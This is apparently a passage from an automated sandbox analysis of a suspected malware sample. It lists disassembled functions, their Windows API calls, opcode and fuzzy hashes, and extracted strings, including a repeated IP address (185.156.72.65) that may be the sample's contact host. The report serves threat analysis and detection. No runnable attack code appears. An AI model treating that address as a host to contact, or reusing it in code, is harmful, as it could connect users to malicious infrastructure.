                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                      • String ID:
                      • API String ID: 158306478-0
                      • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction ID: 3124dd8456e489f230558b3eb58c4822848d10064887246f2ffea9b448aa8e9c
                      • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction Fuzzy Hash: 6311C8B6511515BEA7112BB69C8ACEF7A5EDF89398711002EF50191201FE7CDF82417E
                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,049636EF,0495381E,?,00000000,04952AA0,04952AA2,?,04963868,00000022,00420B0C,00422950,00422958,04952AA0), ref: 049636A1
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction ID: 067c916b0eb0639cacaf8424bae5b75bf55862140bc37f4bcbf575502e0cae7c
                      • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction Fuzzy Hash: 6B21D231B01610BBCB319F65EC42B9A3B6D9B427A4B254235ED07A73A1EB30FD05C6D4
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 049686F4
                        • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0496872C
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0496874C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                      • String ID:
                      • API String ID: 158306478-0
                      • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction ID: feb1a02ec53880696c5514432aa90a6bf02a22c72f3534a569fecb4c0ca89810
                      • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction Fuzzy Hash: 0611C4B66125197E77217B765CC8CAF3DADCEC91A87010534F90792100FA60FE0282B6
                      APIs
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000), ref: 0041CC3F
                      • GetLastError.KERNEL32(?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000,?,0041A061,?), ref: 0041CC4B
                        • Part of subcall function 0041CC11: CloseHandle.KERNEL32(FFFFFFFE,0041CC5B,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000), ref: 0041CC21
                      • ___initconout.LIBCMT ref: 0041CC5B
                        • Part of subcall function 0041CBD3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CC02,0041C88C,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CBE6
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CC70
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction ID: 7cbbc293f9202e5c3ba5059a923030a343761d0fd9452bc47cab7a7a002841ff
                      • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction Fuzzy Hash: 34F03036580218BBCF221FD5EC45ADE3F26FF497A0B404031FA0D96131D6328C619BD8
                      APIs
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000), ref: 0496CEA6
                      • GetLastError.KERNEL32(?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000,00000000,?,0496A2C8,?), ref: 0496CEB2
                        • Part of subcall function 0496CE78: CloseHandle.KERNEL32(0042CA30,0496CEC2,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000,00000000), ref: 0496CE88
                      • ___initconout.LIBCMT ref: 0496CEC2
                        • Part of subcall function 0496CE3A: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,0496CE69,0496CAF3,00000000,?,04969D25,00000000,00000000,00000000,00000000), ref: 0496CE4D
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000), ref: 0496CED7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction ID: 525149c5109c89400660402c7a5a91214a4283679d32bd0e85d18a4c906a30fe
                      • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction Fuzzy Hash: 18F0AC36540158BBCF225F95EC08A9A7F36FF496A1B458030FA5A96120D732AC219BD4
                      APIs
                      • SleepConditionVariableCS.KERNELBASE(?,00409CEA,00000064), ref: 00409D70
                      • LeaveCriticalSection.KERNEL32(0042D064,0040104A,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D7A
                      • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D8B
                      • EnterCriticalSection.KERNEL32(0042D064,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D92
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                      • String ID:
                      • API String ID: 3269011525-0
                      • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                      • Instruction ID: ff8beb748e1eb1f5c5e1e2cf8612c53580035ff8934018e5237f3a6b450dea6c
                      • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                      • Instruction Fuzzy Hash: 99E0ED31A85624FBCB111B60FC09AD97F25AF09B59F508032F90576171C7755D039BDD
                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 00410FAD
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorHandling__start
                      • String ID: pow
                      • API String ID: 3213639722-2276729525
                      • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                      • Instruction ID: 84ba177bd0b46390de2483f8fdd39171a32ac8a21a9604072373650434c829d0
                      • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                      • Instruction Fuzzy Hash: 96515B71A0820196CB217B14DA023EB6BA0DB40751F618E6FF095453E8DBBDCCD7DA4E
                      APIs
                      • Concurrency::cancel_current_task.LIBCPMT ref: 0040970E
                      • std::_Xinvalid_argument.LIBCPMT ref: 00409725
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                      • String ID: vector too long
                      • API String ID: 3646673767-2873823879
                      • Opcode ID: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                      • Instruction ID: 3420b24d6a7003b5252f74598cccc6f366c2f3b22bc1f833b28caab4f548f479
                      • Opcode Fuzzy Hash: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                      • Instruction Fuzzy Hash: B05104B2E002159BCB14DF6CD8406AEB7A5EF84314F14067EE805FB382EB75AE408BD5
                      APIs
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0495BAA6
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0495BB5A
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 3480331319-1018135373
                      • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction ID: 0e7c3944bde18a15751221af0c1f39edf172653e307827899b3639b505ec047c
                      • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction Fuzzy Hash: 6C41A134E00219AFDF10DF68C884AAEBBF5AF45328F248175EC14AB365D771BA05CB91
                      APIs
                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C0C5
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EncodePointer
                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction ID: 8859d5309be3b2406ffac81c3508a23779d2d647c67c70ddfd5e45ce13346e89
                      • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction Fuzzy Hash: 89415A72900209EFCF15DF94CD81AAEBBB5BF48304F18816AF905BA292D3399951DF58
                      APIs
                      • RtlEncodePointer.NTDLL(00000000), ref: 0495C32C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EncodePointer
                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction ID: 469ca81cc88efd7d276d9fe38d2634b47bf2dc2cc48431cd51c1df6cbec78555
                      • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction Fuzzy Hash: BD412872900209AFDF16DF98C981EEEBBB9BF48304F248169FD15A7225D335A950DF50
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00401084
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                      • Instruction ID: 35b52d446d861aa170816ff75a143a42135cfe1fbea8b7bbecd3f4fad1973d83
                      • Opcode Fuzzy Hash: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                      • Instruction Fuzzy Hash: E32137B0F002859EDB14EFA4D9557A97BB0EB01308F90017EE4457B3A2D7B85985CB5D
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00401194
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                      • Instruction ID: 080c8299786e9307901dd30be4a7bf730519a23c54167f024b5206933e891779
                      • Opcode Fuzzy Hash: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                      • Instruction Fuzzy Hash: 5E217CB0F002409ACB24EFA4E8257A97BB0FF04308F50027EE5056B3D2D7B82945CB5D
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004012A4
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                      • Instruction ID: f3bdde1b4a8bc64e2f46b2d629ea0fd90e9d23492dc14d44f4e24dc008f4330a
                      • Opcode Fuzzy Hash: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                      • Instruction Fuzzy Hash: BA212274F002459ADB14FFA8E8157A97BB0BB00308F9041BED512BB2E2D7786901CB5D
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 0495150B
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                      • Instruction ID: b68f67b4c00690e181e770163d78a84ca3d00b31a65fe517a41e0cacc1b0a450
                      • Opcode Fuzzy Hash: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                      • Instruction Fuzzy Hash: 6521D4B4F002059AEB24EFB8E9157A87BB0AF05308FA141B9C9239B2B1D7756506CB59
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 049512EB
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                      • Instruction ID: 9e702a3d0036c6607689573dba1b7483ecbe6d04646fe19d8000a92ab8bf8a80
                      • Opcode Fuzzy Hash: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                      • Instruction Fuzzy Hash: 5A2137B0F00245DEEB14EFA8E9167A87BB0EB01308FA00179D84567360D7B56549CB5D
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 049513FB
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                      • Instruction ID: a02c709b0203582cfdba942107a8ff52fd0862dd8be4265b390dd0447ed87fa5
                      • Opcode Fuzzy Hash: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                      • Instruction Fuzzy Hash: 9321F5B0F00244DAEB24EFA4E9257A87BB0EF41308FA002B9DC055B260D7B56545CB59
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004084EE
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: G@ZK$[@G_
                      • API String ID: 2296764815-2338778587
                      • Opcode ID: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                      • Instruction ID: 2d9fbaa08c13fc83b2f5e0005e6d1fa5ae776f13101647786266d8808d8cc77d
                      • Opcode Fuzzy Hash: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                      • Instruction Fuzzy Hash: F501DB70F00285DFC710EBB9AD41969B7A0A719310BA1417EE526BB3D2EA79AC01CB4D
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00407EEE
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: G@ZK$[@G_
                      • API String ID: 2296764815-2338778587
                      • Opcode ID: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                      • Instruction ID: 86c78c31387f24dba649c5f85d45a7e4d1f1fe09f4149f0eb9c238fce71b3fdb
                      • Opcode Fuzzy Hash: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                      • Instruction Fuzzy Hash: D601D6F0F05244DBD720DBA9AC41A6AB7B0AB09304F9005BAF51977792DA396C41CB49
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 04958755
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: G@ZK$[@G_
                      • API String ID: 4132704954-2338778587
                      • Opcode ID: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                      • Instruction ID: b6d9e5f69eea9796bea2d87498c86624bd5840650b0f6347fdc5e806259f9cb9
                      • Opcode Fuzzy Hash: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                      • Instruction Fuzzy Hash: 4D01D6B0F00244DFDB10EFB8AC41969B7B0A759314BB00679D936AB2A0DB75B9058B45
                      APIs
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 04958155
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: G@ZK$[@G_
                      • API String ID: 4132704954-2338778587
                      • Opcode ID: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                      • Instruction ID: 70e303a494107c807b5c4bbdc7990226a0e9e82326240ab6145931cc99123ab7
                      • Opcode Fuzzy Hash: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                      • Instruction Fuzzy Hash: 0001D6F1F41204DBE720EFA8AC41A69B7B0AB59314FB006B9E91957370DB3568458B45
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00407899
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: @G@K$A@K.
                      • API String ID: 2296764815-2457859030
                      • Opcode ID: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                      • Instruction ID: 02867bdc75deabfbdae8ac7f1914e191d6f0b036ba1bc0e64f50d331b9525a60
                      • Opcode Fuzzy Hash: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                      • Instruction Fuzzy Hash: 94016271F042049BC710DF58E946A58B7B0EB48304F60417BE906A7392D779AE418B5D
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004079A9
